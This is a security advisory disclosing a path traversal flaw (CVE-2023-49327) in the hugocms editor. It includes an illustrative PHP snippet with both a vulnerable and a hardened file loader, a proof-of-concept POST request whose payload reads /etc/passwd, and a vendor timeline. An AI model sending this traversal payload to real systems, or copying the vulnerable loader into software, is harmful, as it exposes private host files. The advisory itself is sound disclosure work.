usd-2023-0034 | Arbitrary File Reads in hugocms

Advisory ID: usd-2023-0034
Product: hugocms
Affected Version: (latest as of 25.09.2023; commit 77443d6)
Vulnerability Type: CWE-35: Path Traversal
Security Risk: HIGH
Vendor URL: https://hugoeditor.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Published
CVE number: CVE-2023-49327
First Published: 2024-07-18
Last Update: 2024-07-18

Description

The application hugocms, developed by Inter-Data, provides a frontend for the static site generator Hugo to manage posts and other aspects of the site. The application does not provide any access-control mechanism of its own and recommends restricting access via a web server's basic auth capabilities.

Users with access to hugocms can read arbitrary files of the host system by performing a path traversal. The flaw is present in hugocms/editor.load.php: the path supplied in the file parameter of a POST request is used to read a file without being confined to the site's content directory, so traversal sequences such as ../ escape it.
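The following PHP snippet is an added illustration and is not hugocms's code; it shows the class of bug the advisory describes (a user-supplied path concatenated onto a base directory) next to a hardened variant that canonicalises the path with realpath() and rejects anything that resolves outside the base directory. The content root /var/www/site/content, the function names, the handler wiring and the use of PHP 8 (str_contains, str_starts_with, union return types) are assumptions made for the example.

```php
<?php
// Added example, not code from hugocms. CONTENT_ROOT, the function names and
// the handler wiring are assumptions; the POST parameter name "file" mirrors
// the advisory's proof of concept.
declare(strict_types=1);

const CONTENT_ROOT = '/var/www/site/content'; // assumed location of the editable files

// Vulnerable pattern: the request value is appended to the base directory
// without canonicalisation, so "file=/../../../../etc/passwd" resolves to
// /etc/passwd whenever CONTENT_ROOT sits at least four levels deep.
function loadFileVulnerable(string $file): string|false
{
    return @file_get_contents(CONTENT_ROOT . $file);
}

// Hardened pattern: canonicalise both the base directory and the candidate
// (realpath() also resolves symlinks and fails for paths that do not exist),
// then require the candidate to remain inside the base directory.
function loadFileHardened(string $file): string|false
{
    $root = realpath(CONTENT_ROOT);
    if ($root === false) {
        return false;
    }
    // Refuse embedded null bytes rather than letting any file API truncate the path.
    if (str_contains($file, "\0")) {
        return false;
    }
    $candidate = realpath($root . '/' . ltrim($file, '/'));
    if ($candidate === false) {
        return false; // does not exist, or realpath() refused it
    }
    // Compare with a trailing separator so that a sibling directory such as
    // /var/www/site/content2 does not pass the prefix check.
    if ($candidate !== $root && !str_starts_with($candidate, $root . DIRECTORY_SEPARATOR)) {
        return false;
    }
    if (!is_file($candidate)) {
        return false;
    }
    return file_get_contents($candidate);
}

if (PHP_SAPI === 'cli') {
    // Stand-alone check with the advisory's payload: the hardened variant rejects
    // it regardless of the host layout; the vulnerable one reads /etc/passwd if
    // CONTENT_ROOT exists on this machine.
    $payload = '/../../../../etc/passwd';
    var_dump(loadFileHardened($payload));                 // bool(false)
    var_dump(loadFileVulnerable($payload) !== false);     // true on a host where CONTENT_ROOT exists
} else {
    // Request handler wiring in the shape of the advisory's POST request.
    $body = loadFileHardened((string) ($_POST['file'] ?? ''));
    if ($body === false) {
        http_response_code(400);
        exit('invalid file');
    }
    header('Content-Type: text/plain; charset=UTF-8');
    echo $body;
}
```

The decisive step is comparing the canonicalised result against the canonicalised base directory; stripping "../" sequences from the input is not sufficient, since encoded or doubled sequences and symlinks inside the content directory can still lead outside it.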

Proof of Concept

The following request reads the passwd file of the host:

Request:

POST /public/edit/hugocms/editor.load.php HTTP/1.1
Host: 10.1.1.157
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 28

file=/../../../../etc/passwd

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 18:40:34 GMT
Server: Apache/2.4.57 (Debian)
Vary: Accept-Encoding
Content-Length: 1136
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[...]
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
[...]

Timeline

  • 2023-09-25: Vulnerability identified by Florian Dewald.
  • 2023-10-02: Sent first contact request.
  • 2023-10-16: Sent reminder email mentioning disclosure deadline.
  • 2023-10-25: Sent another reminder stressing that vulnerabilities will be publicly disclosed.
  • 2023-11-13: Sent another reminder stressing our deadline and that vulnerabilities will be publicly disclosed if we receive no answer.
  • 2023-11-22: Reached vendor via phone, sent vulnerability information.
  • 2023-12-04: Sent status update request to info@inter-data.de.
  • 2023-12-06: Inter-Data reports that a fix is being worked on.
  • 2024-01-03: According to Inter-Data a fix is in the works and should be finished soon.
  • 2024-01-24: Reached out to Inter-Data for another status update.
  • 2024-01-26: Inter-Data reports that the vulnerability is fixed.
  • 2024-07-18: This advisory is published.

Credits

This security vulnerability was identified by Florian Dewald of usd AG.